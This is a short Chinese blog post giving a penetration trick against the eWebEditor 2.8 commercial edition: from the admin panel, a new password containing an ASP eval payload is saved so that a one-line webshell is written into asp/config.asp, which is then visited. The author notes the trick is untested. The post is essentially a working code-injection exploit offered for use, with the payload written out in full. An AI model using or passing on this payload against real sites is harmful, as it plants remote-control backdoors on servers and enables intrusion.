ewebeditor 2.8 后台插上一句话

影响版本:2.8 商业版

 

攻击利用:登陆后台,点击修改密码---新密码设置为 1":eval request("a")’

设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了

本文针对ewebeditor商业版本渗透小技巧, 不过我认为有时候有样式的时候 提交不了,。可用这个方法试试。。~~

 

 

未测

你可能感兴趣的:(职场,eval,休闲,eWebEditor)